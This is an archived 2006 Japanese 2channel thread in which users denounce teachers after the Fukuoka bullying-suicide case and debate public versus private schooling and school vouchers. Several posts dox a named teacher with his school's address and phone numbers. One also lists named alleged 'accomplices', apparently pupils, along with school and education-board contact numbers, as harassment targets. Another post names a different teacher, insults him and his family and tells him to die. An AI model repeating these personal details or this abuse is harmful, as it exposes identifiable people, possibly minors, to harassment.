2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

教 師 っ て 人 間 の カ ス ば っ か

1 :DQN ◆NHK/o78Go. :2006/10/16(月) 07:51:52 ID:rHiqDdpR
自分より下の立場の生徒をいじめたり いびったり セクハラしたり

福岡いじめ自殺 担任教諭も生徒をいじめていた
http://news20.2ch.net/test/read.cgi/news/1160905729/


2 :実習生さん:2006/10/16(月) 07:59:59 ID:sdWOzGBv
「自分がされて嫌な事は人にするなっ!」ってのは大人の決めセリフみたいなものだが… 果たしてそれを大人自身が守れているのか?まだ子供である俺は大人言いたい。「自分が守れない事は他人に言うな!」

3 :実習生さん:2006/10/16(月) 08:14:58 ID:MMfvb/18
教師って人間のカスがなるもんだよ

4 :実習生さん:2006/10/16(月) 08:31:32 ID:ttUqPK8y
教師の質が墜ちたね。


5 :実習生さん:2006/10/16(月) 09:15:01 ID:nYdE/Xlo
やっぱりお題がくだらないと、反響も少ないんだね!

6 :実習生さん:2006/10/16(月) 11:26:54 ID:c969Tks0
大学でガリ勉やってれば誰でもなれる教師

7 :実習生さん:2006/10/16(月) 14:39:05 ID:gZxng8w9


だって、からかいやすかったんだも〜ん


 

8 :実習生さん:2006/10/16(月) 14:40:00 ID:oBJnKyN3
福岡県朝倉郡筑前町 久光1640
三輪中学 (職員室 094 6-2 2-13 61)
田村伸一(男) 国語教師 年齢45歳



9 :実習生さん:2006/10/16(月) 15:27:20 ID:mh9q/Y5I
ガリ勉するほど大変じゃない。
教育学部とか笑えるくらい低レベル。
頭はからっぽで心は下衆。
存在意義なし。

10 :実習生さん:2006/10/16(月) 16:05:08 ID:EWSMNOt2
>>9
つーかそもそも公立の小・中学の教員の時点で教育学部とか関係なく、そんなハイレベルな大学から来てない。
一つの学校の他の学部と比べて教育学部の偏差値が特別低いワケではない。

11 :実習生さん:2006/10/16(月) 20:06:07 ID:jBZExZT+
ただでさえ不利な教師がこの事件でさらに不利になったなw現場の教師に徹底的な
圧力がかかるのも時間の問題だ。また教室で首を吊ることになるかもなw

12 :実習生さん:2006/10/16(月) 21:23:20 ID:TsT6SsCZ
死ねよ馬鹿狂師。



13 :実習生さん:2006/10/16(月) 22:33:00 ID:j6OeY5fM
教えてやる って上から目線ばかりだからダメなんだよ。
偉そうにするのと知識を教えるのは違うのに、常に子供を相手にして狭い世界にいるから、感覚が麻痺してくるのかも。
麻痺したことにも気付かなくなったらおしまいでしょ

14 :実習生さん:2006/10/16(月) 23:05:30 ID:2dqznCTM
公立学校教師は日本全国一律で給料5割カットすべきだ!

15 :実習生さん:2006/10/16(月) 23:07:30 ID:s4N8qi46
>>14
頭使えよ。ただでさえ教員の質悪いのに、さらに拍車がかけるだけ。

16 :実習生さん:2006/10/16(月) 23:23:33 ID:2dqznCTM
>>15
浮いた金を私学助成金に充てればよい。
質の良いところに適正に資金を充実させることこそ質向上に
つながるし、教員の質の悪化も防げる


17 :実習生さん:2006/10/16(月) 23:26:14 ID:s4N8qi46
>>16
私学ってそんなにいいか?実際に在学したことあって言ってるの?

18 :滅殺:2006/10/16(月) 23:27:15 ID:6IEQn0FA
かんけぇ〜ねぇ〜話するが、日本の教育を狂わせたのは「金八先生」の
ドラマが原因なんだってさ!!

19 :実習生さん:2006/10/16(月) 23:27:54 ID:s4N8qi46
>>18
意味不明。寝てていいよ。

20 :滅殺:2006/10/16(月) 23:30:19 ID:6IEQn0FA
お前もな!!

21 :実習生さん:2006/10/16(月) 23:34:34 ID:2dqznCTM
>>17
公立よりは断然私学のほうが質の良い教育活動を実践している。
教員の緊張感と資質向上の熱意が圧倒的に公立より上なのは確か。
教師の格付けはこんな感じなのが現状

私学の優秀教師>>私学の格下教師>>>公立の優秀(に見える)教師
>>>>>(越えられない壁)>>>>>>公立ダメ教師

22 :実習生さん:2006/10/16(月) 23:36:48 ID:s4N8qi46
>>21
オマイ私学行ったことある?結構私学の教員ってピンキリだぞ?

23 :実習生さん:2006/10/16(月) 23:40:14 ID:Iq/9saiW
学校の先生=公務員=言われたことしかできない糞=税金泥棒=間接殺人鬼予備軍

24 :実習生さん:2006/10/16(月) 23:46:16 ID:2dqznCTM
>>22
そうか?私学には公立にいるようなクズ教師は皆無だぞ。
私学は世間の評判が直接学校経営に反映されることと、
ぬるま湯公務員と違い、怠慢教師はクビもありうる。
これが一番大きいのでないか

25 :実習生さん:2006/10/16(月) 23:48:16 ID:s4N8qi46
>>24
まぁ聞きたいんだが、オマイは私立中学行ってたの?
そもそも私学自体がピンキリなんで、俺はなんとも思わない。

26 :実習生さん:2006/10/16(月) 23:58:25 ID:2dqznCTM
俺は公立中→私立高だったから公立と私立の教師の質の差を
もっともよく知っている。
中学時代はアフォ教師ばかりでまったくあてにならない存在だった。
しかし私立高入学で環境激変!
まさに”先生”と心から呼びたくなる教師と出会えた。
だから
>>23
×学校の先生→○公立教師 とすべき


27 :実習生さん:2006/10/17(火) 00:31:04 ID:pp+w0ftM
公立校は、親もガキどもも馬鹿ばっかだから、仕方がない。
私立校は、親もガキどもも、選ばれて入ってきたんだから、うまくいって当たり前。

そんなもんなんじゃないの?

28 :実習生さん:2006/10/17(火) 01:07:37 ID:m4He89qN
基本的に教職なんてのは勉強はそこそこ出きても社会性に乏しく会社組織で
やっていけない肩輪人間の逃げ道だから今回の福岡みたいな理不尽な教員が
生まれるんだよ。社会の荒波に揉まれるのが嫌いな事なかれ主義者の巣窟。

29 :実習生さん:2006/10/17(火) 01:43:42 ID:/sErGMxf
そんな不適格な人間に教育なんて重要な仕事をさせるのはもってのほかだね
国全体に汚染が広まっちゃうよ

30 :実習生さん:2006/10/17(火) 03:46:33 ID:Obmkw9wb
「教師になりたい」と言う奴が昔から理解できなかったな
相当な挫折から救われたならまだしも、何がどうなりゃそんな気持ちに至るのか・・
ぬくぬくちやほや能天気に生きてきた人間特有のママゴト的願望なんだろうな・・・

31 :実習生さん:2006/10/17(火) 07:18:22 ID:5l3rL40y
>>26
高校は公立も私立も教員はどっちもあまり大差ないことないか?
中学の質はまったく違うけど。

>>30
多分>>29で言ってるように最初はそれなりの志を持っていたんだと思われる。

32 :実習生さん:2006/10/17(火) 12:25:25 ID:8NtXothF
人間性無視で簡単になれてしまうのが悪い

33 :実習生さん:2006/10/17(火) 12:26:12 ID:D+YsABDF
>>32
教員採用試験は結構難しいぞ。
非常勤講師は簡単になれるけど。

34 :実習生さん:2006/10/17(火) 12:49:23 ID:/sErGMxf
難しいだけで、適任者を選別出来る訳ではない

35 :実習生さん:2006/10/17(火) 14:13:51 ID:xVTCUoxT
ダメ教師は容赦無く首を切れ。

36 :実習生さん:2006/10/17(火) 16:20:19 ID:m+NVhjFP
教師なんて馬鹿がなるもんだからな

37 :実習生さん:2006/10/17(火) 16:52:03 ID:wryFCJvf
この国の教育界は腐っている。

38 :実習生さん:2006/10/17(火) 17:45:34 ID:QJ6VeqZE
>>34
>>33だがそこは同意。

39 :実習生さん:2006/10/18(水) 01:28:19 ID:mlnQYIQ3
一生安泰ってのもだめだよね。

ハングリー精神みたいなもんがないと

40 :実習生さん:2006/10/18(水) 01:35:22 ID:T/ovyVgy
そんなに教師が嫌いなら、教師のいる学校に行かなきゃいいじゃん。
それとも、テメーの実力がないから、学校にしがみついていなきゃ
不安なのかな。
な・さ・け・ね・ぇ!!


41 :実習生さん:2006/10/18(水) 01:51:51 ID:N7XOiHh1
>>40
っていうか、少なくても中学までいくのは「義務」でしょ?
それに、学校(含高校、大学)出てなければ余程のことがない限り
実力があるとも評価してもらえないんじゃない?
君の主張は「暴論」に近いかとw

42 :実習生さん:2006/10/18(水) 01:54:38 ID:T/ovyVgy
このスレ立てたやつや同調するやつの方が暴論だろ。
しかも、悪意に充ち満ちている。

43 :実習生さん:2006/10/18(水) 01:57:09 ID:T/ovyVgy
学校を出なけりゃ評価されない???
だったら、そこで働く教師が、なんでカスばかりになるのだ?


44 :実習生さん:2006/10/18(水) 02:04:46 ID:Oz1MPs+h
>>41
おまえ相当無知だな。
教育の権利と義務の主体を勉強しなおせw

45 :実習生さん:2006/10/18(水) 02:33:18 ID:cp/g6l5j
マスゴミのせい
馬鹿親子のせい
左翼教師のせい

46 :実習生さん:2006/10/18(水) 22:52:37 ID:h3L4Dnr6
>>45
右翼の方がいいか? w

47 :実習生さん:2006/10/18(水) 22:56:35 ID:KvAGeX2c
馬鹿なやつも多いですよねー。
尊敬に値しない先輩教師の方が多いです。
でも反面教師ばかりで勉強にはなるかな(笑)

48 :実習生さん:2006/10/19(木) 00:01:33 ID:11iFUN9n
★現役学生が教師の不適切発言を録音して晒すスレ★
http://school5.2ch.net/test/read.cgi/edu/1161161066/


49 :実習生さん:2006/10/19(木) 00:38:21 ID:c3lYCXd4
とりあえず2ch的には

大卒(教員含む)>>>>>>専門・短大卒≧高卒>>中卒

なので、低学歴はあまりしゃしゃり出ないように。

50 :実習生さん:2006/10/19(木) 00:48:16 ID:QQVOMNyK
教師なんて小学生からもバカにされてるのに・・・

51 :実習生さん:2006/10/19(木) 00:51:24 ID:c3lYCXd4
>>50
専門学校板行って見たら?

52 :実習生さん:2006/10/19(木) 00:53:13 ID:nJICvEa1
これから必ず学校を警察の管理下に置きます。
教師の皆さん警官の言うことを良く聞いてくださいね。

53 :実習生さん:2006/10/19(木) 00:57:40 ID:QQVOMNyK
ま、大卒の俺は教師をバカにしてるけどなw

54 :実習生さん:2006/10/19(木) 00:58:18 ID:MEcEbp/8
カスにも値しない教師がいるのも事実。
人には適性ってものがあるのに、そうじゃないバカが勘違いして教壇立ってるから(笑)
もちろん素晴らしい人もいるが、ごくわずか。

55 :実習生さん:2006/10/19(木) 01:02:57 ID:c3lYCXd4
>>53
俺も最初は教師バカだと思ってたけど、中学生ころを考えて見たら、結局8割方がバカだったじゃないかと思ってるので、
結局のところ、どっちもどっちで何も言えないところ。

まぁ「教師に民間の厳しさを教えるスレ」だっけ?これちょっと痛すぎないか?

56 :実習生さん:2006/10/19(木) 01:20:19 ID:OdCb8Ppy
だから、カスが多い教師がたくさんいる学校というところに行くなよ。
学歴がなくったって、実力があればいいんだからさ。
カスに教わったって、何の知識も付かないばかりか、不愉快だろ?
無理して学校なんていくな。


57 :実習生さん:2006/10/19(木) 02:02:26 ID:YvkSLlEm
53さん、同感です。
教師は、教育大学出が多いけど、教育大学で専門的な部分を学んできた奴が決して向いているわけでもない。
生徒たちが現社会において成功するような教育が必要である。
だから、民間企業出身の人間が教壇に立って勉強以外の事も助言できる教師が求められているのでは・・・

教育の現状しかしらない奴は学校現場といった閉鎖的な集団の中でどうとか、こうとか言って満足しているバカばっか。
そのくせ、プライドとかで平気で生徒の前でホラ吹いて自分の理想を演じきる。


58 :実習生さん:2006/10/19(木) 08:49:23 ID:fLIWe91e
>>57
俺田舎の国立大学の大学生なんだけど、一言お願い。
別に教育学部の連中見てても、別にそこまで他の学部と違いがあるワケでもないよ。
「進学校によくいるタイプの人間だなぁ」と、そんなくらいしか思わないと思う。

どこでどんな風にしてクソ教員ができたのか、そのメカニズムがわからないとオモ。
よく一緒にカラオケ行ったりしてるし、教育学部のヤツが別に閉鎖的な性格なワケではない。

59 :実習生さん:2006/10/19(木) 15:46:30 ID:ineV5kzO
やはり近年の採用数の増加に伴い質の悪い人間が教師になっていることと
40〜50代のでもしか が現場を腐らせている。

教員採用試験や免許更新で教師の資格のハードルはもっと高くするべし
以下の条件をすべて満たした人物しか教壇に立ってはいけないと思う。

1旧帝院卒相当の学識を持っている
2どんな個性の生徒もひきつけられるカリスマ性をもっている
3生徒・親・同僚・管理職誰からも100%信頼される人間性をもっている
4「この人でなければならない」と周りが思う真のonly oneたる資質をもつ
5どんな場面にも冷静かつ的確に対処できる頭の回転の速さを持ち合わせている
6職務に忠誠心をもった勤勉家であること
7使命のため自らの命を投げ出す程のどんなリスクも苦にしない自己犠牲愛のあふれるひと
824時間常に生徒指導にできる体制をとり、夜中2時に呼び出されることも苦にしない人
9給料は月10万程度ボーナス無しでも不平を言わない人 かつその給料すべてを教材研究に捧げる人

以上1つでも欠けている人は教師には向かないと思うし教師とは呼びたくない。
当然すべての条件を満たして最低ラインクリア だろう
採用試験も今現職にいる教師もよくその資質を 調べて1つでも欠けていたら
指導力不足教員に認定するか分限免職にするべき

60 :実習生さん:2006/10/19(木) 19:44:00 ID:uCENioiO
>>59
労働基準法って知ってるか?
と釣りにマジレスしてみる。

61 :実習生さん:2006/10/19(木) 20:28:39 ID:D4jI2H9x
>>58
可能性の一つとして聞いといてくれ。
40代後半から退職間際の世代は教師不足で、わりに能力や性格はあまりみないで採用する政策をとっていたはずだ。
あとは古き傲慢な公務員時代の悪癖を残しているあたりかな。
前の時代の政策のミスのつけが今に来ている。
ついでに書くと、今は学校の管理職はテストを受けることでなるのだが、
生徒に対して熱心な先生ほど、現場を離れてテストに力を費やさない。
全てではないが、現場苦手だったり、問題ある人ほど上にいくことが多い。

若手の問題は、教師の仕事のイメージかな。
大半の人間が、楽で威張れて公務員で安泰とイメージしているから、
そのイメージのまま、就職しようとする人もいるからじゃないかな。
採用減っているとはいえ、全国割合でみれば大量採用といっていい組織だしね。玉石混交なんでしょ。

62 :実習生さん:2006/10/19(木) 20:30:51 ID:x3aiFt4+
教員の方がこのスレにいらっしゃるかどうかわからないけれど、
公立高校で生徒が喧嘩した場合に一方がもう一方を殴った場合事の発端に関係なく
殴った方だけに制裁(例えば謹慎など)を加えるものなのでしょうか?
一般の方でも結構ですので是非教えて頂きたいのですが。

63 :実習生さん:2006/10/19(木) 20:51:00 ID:ineV5kzO
>>62
生徒が喧嘩するのは学校の管理能力不足
生徒よりも教師に制裁を加えるべし(免職+高額罰金で干し殺しでよい)

64 :実習生さん:2006/10/19(木) 22:48:19 ID:x3aiFt4+
>>63
早速のレス有り難うございます。
私は保護者ではないのですが、先に書きましたような事例がありそのことについて
公平なジャッジをなされているか問い合わせても「問題なし」としてまったく情報開示しようとしないので
こういう質問をさせて頂きました。
学校の対応にはまったく呆れています。

65 :実習生さん:2006/10/19(木) 22:58:34 ID:aTQvn1aF
教師にカスが多いことにはまったくもって同意。
ま、良い先生もいるけどさ。そうじゃないのは先生と呼びたくないよね。ただの人。もしくはカス。

66 :実習生さん:2006/10/19(木) 23:13:16 ID:x3aiFt4+
学校というのは(特に公立は)内部のことを隠したがるもんなんでしょうかね。
あと、教師の服装の乱れって一般社会人から見ると尋常じゃないですよね。
あれで生徒に指導してるんだからとんでもないな。


67 :実習生さん:2006/10/19(木) 23:42:02 ID:D4jI2H9x
>>64
常識的には、喧嘩した生徒ふたりを引き離し、
個別に話を聞く。さらに周囲にも事情を聞く。
そして喧嘩した生徒と関係のある教師を集めて、生徒のふだんの様子、性格、態度、家庭環境等を聞き、会議して対応決めると思う。
対応としては反省文、仲直りの橋渡し、美化活動、カウンセリング、集会による訓告あたりかいな?
で、場合によっては保護者に連絡したり呼び出ししたり等か。

でさ、喧嘩ってさ、生徒の内面や家庭、交遊関係にふれることだから、
喧嘩した子の保護者ならともかく、生徒のプライバシー保護の点から、部外者には
それこそ常識のある学校はまず教えてくれないだろ。
もっとも報告書は作るだろうから教育庁あたりを通して情報開示要求して認可とれば教えてくれるでしょ。

68 :実習生さん:2006/10/20(金) 00:14:21 ID:VBjY38wh
>>61
俺は>>58だが、一応友達の話を聞いても、そんな風にとらえてるとは思えない。
教員志望と言っても、ただのいち大学生ってことは他学部と何ら変わりはない。

あと今教育を受けている側なんだから、短絡的な発想はまず無いはず。

69 :実習生さん:2006/10/20(金) 00:36:52 ID:E+sYq4J7
>>68
学生だから知らないってこともあるけどな。政策のミスみたいなことを話し、現場や教師を変な先入観で見られても問題なだけだから学生にはむしろ話すことでないしな。
あと今時教育学部なんて選択して来ている人間は、就職に不利かつ教師になっても厳しいこと知っているだろ。
その上で行ってるから、熱意もやる気も能力の上でも優秀なのも多い。


70 :実習生さん:2006/10/20(金) 00:42:20 ID:1c9zvLEe
教師は熱意だけではできませんよ。
教師間でいじめもある。
出る杭はうたれる(笑)
精神年齢が低く低レベルなところでの競争意識はかりが高い。
やっぱカスばかり。

71 :実習生さん:2006/10/20(金) 00:42:29 ID:E+sYq4J7
あ、つけくわえとくと、「教師の若手」って30前半くらいまでね。
教師は新卒で現場に正式に即採用少ないから。
ここ数年の正規職員は20代後半から30代前半が採用一年目多いから。


72 :実習生さん:2006/10/20(金) 01:50:16 ID:5YfxufIQ
>>59
一体どこで採用数が増加しているのかと。

73 :実習生さん:2006/10/20(金) 01:57:41 ID:5YfxufIQ
>>61
若手の大半は先生が楽なんて意識持ってねぇよ。
教師になるまでも、なってからもな。
おまえあれだろ。デモシカ教師世代だろ?

全国に学校がいくつあると思ってんの?
企業の採用と比べて言ってるのか?ならそんな大企業がどこにあるっての?

物事を斜からみすぎてませんか?
ちょっと落ち着いて鏡で今の自分の顔を見てみろ、な?w

74 :実習生さん :2006/10/20(金) 05:22:27 ID:M2vw8kzx
学校は勉強するところ
塾や私立は、それをわかっている親の子どもが入ってくるが、公立は義務というだけで入ってくる違い。
勉強以外のことを学校に求めるから、不満ばかり出てくる。
絶対に私立へ行ったほうがいい。
公立には 貧乏人とバカがいる。教師はそいつらの面倒をみているから勉強が進まない。



75 :実習生さん:2006/10/20(金) 21:59:34 ID:88LRGKJj
>>60
聖職なんだし そーゆー法がないホウがいいのに

76 :実習生さん:2006/10/20(金) 22:18:37 ID:J1/Yr//4
駅弁大学とかの三流大学出身の教師たちは授業が下手だったなあ。
しかも、人間のカス。

77 :実習生さん:2006/10/20(金) 22:24:08 ID:z0Irx3Iu
一連のいじめ問題で、教師は信用できないとの風潮が固定化したな。

78 :実習生さん:2006/10/20(金) 22:28:16 ID:mqAToJEb
>>67
うちの学校では
@当事者、目撃者から詳細な事情聴取。
A集めた情報を整理し矛盾はないか確認。矛盾点は徹底的に情報収集。
B保護者に連絡、被害生徒の保護者の意向確認。被害生徒の保護者が納得できる解決策を検討。
C学校側立ち会いのもと、加害生徒および保護者から被害生徒および保護者に謝罪させる。
D警察への被害届けについて被害生徒保護者の意向確認、指導。
という流れです。この流れを『そこまでするか?』と思うのはオイラだけですか?

79 :実習生さん:2006/10/20(金) 22:39:04 ID:H03g+E9E
これ貼るとアボーンかね?
 
生徒を虐め殺した教師 田村伸一(47) 専用スレッド
http://school5.2ch.net/test/read.cgi/edu/1160962734/

福岡県朝倉郡筑前町 久光1640
三輪中学 (職員室 094 6-2 2-13 61)
田村伸一(男) 国語教師 年齢47歳

共犯
岸本和来 谷岡正義 黒澤翔太 青森天 川宮進 木柳晋太郎 紀伊島涼

学校の電話番号
三輪中学校 (代) 0 9 4 6 - 2 2 - 2 2 3 1 福岡県朝倉郡筑前町久光1640
三輪中学校 校長室 0 9 4 6 - 2 2 - 1 3 1 7 福岡県朝倉郡筑前町久光1640
三輪中学校 職員室 0 9 4 6 - 2 2 - 1 3 6 1 福岡県朝倉郡筑前町久光1640
三輪中学校 給食室 0 9 4 6 - 2 3 - 0 4 7 7 福岡県朝倉郡筑前町久光1640
http://phonebook.yahoo.co.jp/list?a2=40447&g3=1511000
三輪中学校メールアドレス
miwa.jr@basil.ocn.ne.jp

●福岡県庁ダイヤル直通電話番号
教育庁
教育長室 0 9 2 - 6 4 3 - 3 8 5 0
次長室 0 9 2 - 6 4 3 - 3 8 5 1
理事室 0 9 2 - 6 4 3 - 3 8 5 2
総務部部長室 0 9 2 - 6 4 3 - 3 8 5 3
教育企画部部長室 0 9 2 - 6 4 3 - 3 8 5 4
教育振興部部長室 0 9 2 - 6 4 3 - 3 8 5 5
●福岡県教育委員会
0 9 2 - 6 4 3 - 3 8 6 3


80 :実習生さん:2006/10/20(金) 22:58:33 ID:fjFxgjU2
このスレ立てた奴…かわいそうに…

81 :実習生さん:2006/10/20(金) 23:00:09 ID:j9oBCZF8
教 師 っ て 人 間 の カ ス ば っ か

82 :実習生さん:2006/10/20(金) 23:01:17 ID:3maG1Z15
カスの教務主任は確かにいるが、それで、全てを推し量るというのは
あまりに、無理。

83 :実習生さん:2006/10/20(金) 23:01:45 ID:j9oBCZF8
田村伸一(男) 国語教師 年齢47歳

共犯
岸本和来 谷岡正義 黒澤翔太 青森天 川宮進 木柳晋太郎 紀伊島涼


84 :実習生さん:2006/10/20(金) 23:04:59 ID:FDMSTEW8
スレタイのような大人にならないように頑張るだけだね、情けないけど。

85 :実習生さん:2006/10/21(土) 00:44:09 ID:KHVCf0jc
子供を愛せない香具師ばかりが教師になる風潮がおかしい。いじめの
存在に気付きながら忙しさ等を理由にスルーするバカ教師が多過ぎ。
何か問題を発見したら全力でその解決に当たるのが社会人の基本姿勢
だろうが!今の時代はの家庭や地域社会をはじめ子供の生育環境自体
が非常に歪んでいるのでイジメが何時何処の学校で発生しても決して
おかしくない状況。イジメが表沙汰になった学校の校長に降格処分等
の厳罰を下すような理不尽な教育委員会は即刻解体させるべき。

86 :実習生さん:2006/10/21(土) 00:57:17 ID:2wZ7kTMC
勉強しないと2chなんかやってるカスになるぞと常日頃から教えておくことが必要。

87 :実習生さん:2006/10/21(土) 01:37:27 ID:oGKRagMc
>>78

そこで一つ気になるのが加害被害ってそうはっきり分けられる物でしょうか?
もちろん過失割合の程度はあるでしょうけれど。
>>78さんの学校だけではないんでしょうけれど、なんだかなぁという印象を受けました。


88 :実習生さん:2006/10/21(土) 01:47:37 ID:gAigtVyh
58君。 そう思ってるなら、かんばってくれ。このバカばっかの教員をかえてくれ。
ただ、現実はみんな採用試験を受かった時は、アツイ教師や思うけど、みんな変わってプライド・保身を優先して、国会議員が選挙の時に「この国を変える」って言ってるのと同じと思う。
ただ、出る杭は打たれて、最初の目的を見失ってわからんではないが・・・
だから、教員も聖職ではなく、今は腐っとる。

俺は、そんな汚い世界から逃げ出した弱い人間かもしれんが・・・
ただ、大学生の58君良く考えてみて。
一回、教員になったら、民間企業では潰し利かないよ。



89 :58:2006/10/21(土) 01:57:37 ID:UrJbq3Id
>>88
いや、俺は別に教員志望なワケではない。

90 :58:2006/10/21(土) 02:08:04 ID:UrJbq3Id
>>90
つか俺工学部だし。教育学部に友達が多いので、その話しただけ。
勘違いさしてスマソ。

91 :実習生さん:2006/10/21(土) 09:09:53 ID:I9fd8Z1q
これだけは間違いない。


教師は人間のカス!

92 :実習生さん:2006/10/21(土) 09:56:28 ID:RhMAUsur
>>85
教師がイジメを無視するのは問題だいが大きくなるのが嫌なだけ。
全力でイジメを解決するのは無料。誰だって面倒な事には関わりたくない。>>85が町で数人に囲まれてる一人の男の子を見たらどうする?もちろん面倒だから無視。これ教師も同じ。誰だって面倒な事には関わりたくない。無視したって良いじゃない。人間だもの・・・・

でぇぇもぉぉぉ!!!!!教師がイジメに加わっっっちゃぁぁあダムェだぁぁよねぇぇ!!!!!!

93 :実習生さん:2006/10/21(土) 11:20:06 ID:Z9yoVEAg
とりあえず、バウチャー導入して、使い物にならん教師は過員休職から分限免職に
持っていくしかない。現行法上ならこれはできるから。

安倍ちゃんの提唱するバウチャー制の最大の眼目は、アホ教師、怠け教師の排除だろ。

そのカラクリはこうだ。

保護者にバウチャーが与えられて、地元の中学校にそのまま行くか、
私立に行くか、他地区の公立に行くか選択できる。

今、仮に三輪中学校のような事件を起こした学校があったとしよう。
すると、他地区からの希望者はゼロだし、地元の生徒は半分くらい
他地区や私立に逃げたとする。
生徒数に合わせて教員数が決まるから、生徒が半分になったら
教員も半分で済む。
そうすると、校長は誰を不要にするかきっちり選ばないと、へんな教師を残したら
今度は自分が責任を取らされて校長をやめるはめになる。
当然、正しく学校運営をするためには、日頃からどの教師が力があって、
どの教師がダメかをきちんと見ておく必要がある。

さらに、教師間も今までは、例えば、他の教師がどんなことを仕出かそうと
自分の給料、地位には何の影響もないから、問題教師に知らん顔。
ところがバウチャーなると、同僚教師の不祥事は生徒減という形で
自分の給料、地位に直接かかわってくるから、知らん顔したくてもできない。
問題教師の問題行動をきちんと校長に報告し、校長は対処せざるを得ないのだ。

94 :実習生さん:2006/10/21(土) 11:26:41 ID:Z9yoVEAg
米英では、そもそも教師の任免は日本よりはるかに簡単にできるし、
学校単位で校長が採用したり、免職したりできる。

日本の場合、そういう雇用上の柔軟性は一切ないから、
バウチャー制は単に保護者の選択権の保障以上に
ダメ教師排除、校長の管理能力向上に効果的。

バウチャー制に反対する意見として「格差拡大」があるが、
そういうしたり顔の文化人も自分の子供は私立に行かせている場合が大半。

「格差は今既にある」わけで、バウチャー制とは無関係。
もし、バウチャー制によって既にある格差が顕在化したら、
それに対しては、教委や国が特別予算措置を講じて、
プログラムを付ければいいだけ。

95 :実習生さん:2006/10/21(土) 12:06:44 ID:JxZtEfBM
 ここに書き込んでいる皆さんはどれだけ「教師」というものを理解されているのでしょうか。
民間企業と比べて云々などと身も蓋も無い言葉を並べても意味がないでしょう?かなり長文になるけど言わせてください。

そもそも教職とは、
・人間とは、残酷なまでの能力差をもった個体である。
・その前提を無視しそれらを生年による一律の集団(学年)として扱い、
・更に細分化(学級)して、その管理責任を担任教師が負う。
といった義務教育の矛盾点・問題点の槍玉に挙げられている職業なのです。更に、
・急増するDQN親からのクレーム
・躾の為されていない餓鬼への対応
・部活と言う名の時間外・不規則就労
等の既に社会化・慢性化している諸問題への取り組みなど、表には出ない実務が山積しているのです。それを処理する実務能力が先ず問われます。
それに加えて、数十人単位で分けられたクラスの1人1人の性格・家庭・交友関係等、全て把握し、その生徒に最も適していると思われる指導方法の模索であったり、
自分の一言が子供の一生を変えるかも知れないという立場を認識した上での発言の選択であったりと、高い人間性をも求められているのです。
このような「カタチの無い結果」を常に出さなければならないということ、この意味において教職とは民間企業を遥かに凌ぐ激務であると言わざるを得ません。

96 :95:2006/10/21(土) 12:09:58 ID:JxZtEfBM
続き

 昔から教職は「聖職」といわれてきました。その背景には、己を律し、私心を抑え、大義に基づき、国家の未来を育てるという高い志をもった先人達の存在がありました。
その先人を貶めることなく、志を継ぐという覚悟が無ければ、恥ずかしくて「教師」であるとはいえません。逆にその覚悟を持たずして、「先生」などとは呼ばれてはいけないのです。
今も昔も教師を目指す学生は多くいます。私も10年前はその中の1人でした。
その中でも、特に高い能力・志を持ち、覚悟を決めた者は後にとてもすばらしい「先生」と呼ばれていくのでしょう。
高い能力を持つが故、その志・覚悟の壁の高さを知ることができた者は教職を諦めていくのです。
能力も無く、教職の持つ意味・意義に気付きもしなかった愚かな者はのうのうと教職課程を進めていき、やがては恥ずかしげも無く「先生」と呼ばれることになるのでしょう。

 無能教師よ、気付きなさい。あなたの周りの者の多くは、
「教師になれなかった」のではなく、
「教師にならなかった」のだということを。

結論、「教員にはカスが多い」  長文でごめん。

ついでに言うと、「じゃあ、お前がやってみろよ!」のガキ逆ギレを一番多くするのが教員だよなwww俺調べだけど。


97 :実習生さん:2006/10/21(土) 17:44:26 ID:oGKRagMc
そうですね、彼らは自己保身には時間と労を惜しまないようです。
そもそも、社会経験の極めて少ないあるいは皆無の教師が生徒の進路の相談に乗ること自体ナンセンスだと思いませんか?
車の運転をしたこと無い人にドライビングテクニックの教えを請うような物ではないかと思います。


98 :実習生さん:2006/10/21(土) 18:02:03 ID:FJWR2c7P
このスレ、馬鹿多すぎ!

99 :実習生さん:2006/10/21(土) 18:06:47 ID:5C2n8SA0
宮城県仙台南高校の世界史教諭、【小野義広○】

あなたは生徒に自分のストレスをぶつけ、野球下手くそな癖に野球部監督してるゴミ野郎です。
ウゼエから死んでくれてオッケイですよ(^-^)!
ギャグは全部寒すぎ、親父ギャグはてめえのブスな妻にでも聞かせろや!
ホームベースみてえな顔しやがって!
お前の子供が可哀相だよ!
ちゃんと避妊ぐらいしろ!

100 :実習生さん:2006/10/21(土) 18:53:43 ID:VNbbL/9J
だって、学校卒業して学校に就職してるんだから、世間知らずの
池沼並の馬鹿が多いんだよ。外部の様子なんてわからないから
「がんばれ」「努力したら実る」なんて精神論で人生OKと思ってるもん。
もっと実質的なこと教えてやれ。

101 :実習生さん:2006/10/21(土) 19:14:22 ID:UzpPYKVB
どうしようもない教務主任を知っているから、教師を悪く言う人間が
いることも分かるけど、それで、教師全体を悪く言うのが分からない。
気の毒だと思うけど、小学校中学校高校とどうしようもない教師ばかり
に教わってきたの? それって、すごく惨めなことだと思うけど。

102 :実習生さん:2006/10/21(土) 21:47:21 ID:cqdNflpn
教師は何をしても叩かれる運命にあるんだ。諦めるしかないね・・・・

103 :実習生さん:2006/10/21(土) 22:00:44 ID:hKS5uws0
精神論と批判する人間。実は精神論の逆に当たる論理を知らない。
精神論というのは究極「信仰」では逆は…?
わかってるのかいな?
実は逆がない。現実主義がそれに当たりそうな気もするが、あき
らめるための現実主義は一方で精神論に近い。科学主義のような
気もする。がそうなると心理学だとか科学の仮面をかぶってる分
野(仮説実証じゃなくて、経験的な事実にもとづく実験主義だよ
あれはさ。)は明らかに精神主義だろ。

 その上で物や経済的な運動に従いながら、それとは別の動きを
する心ってものをかかえながら生きているのが人間です。そのど
っちもが内容であってどちらかだけでは生きていけませんね。

104 :実習生さん:2006/10/21(土) 22:08:07 ID:W/S24zeK
教師は、所詮都道府県からの派遣だから、無責任に成るんだよ。
直接学校に雇われて、学校と1体に成るようにしないと。


105 :実習生さん:2006/10/22(日) 00:34:37 ID:BrSCvPpg
だからよ、教師というカスの集団がいる学校に、行かなきゃいいじゃん。


106 :実習生さん:2006/10/22(日) 00:37:04 ID:urwVC4af
別に教師に会いに行っているわけじゃないしな・・・カスのいるところでも社会的に
学校に行っていないというのはマズイ。

107 :実習生さん:2006/10/22(日) 00:40:09 ID:FTWIwUJ2
いじめを誘発する教師は逮捕しろ。

設計ミスで死人が出れば、殺意は無くても業務上過失致死傷罪。
交通事故も同じ。
医療も同じ。

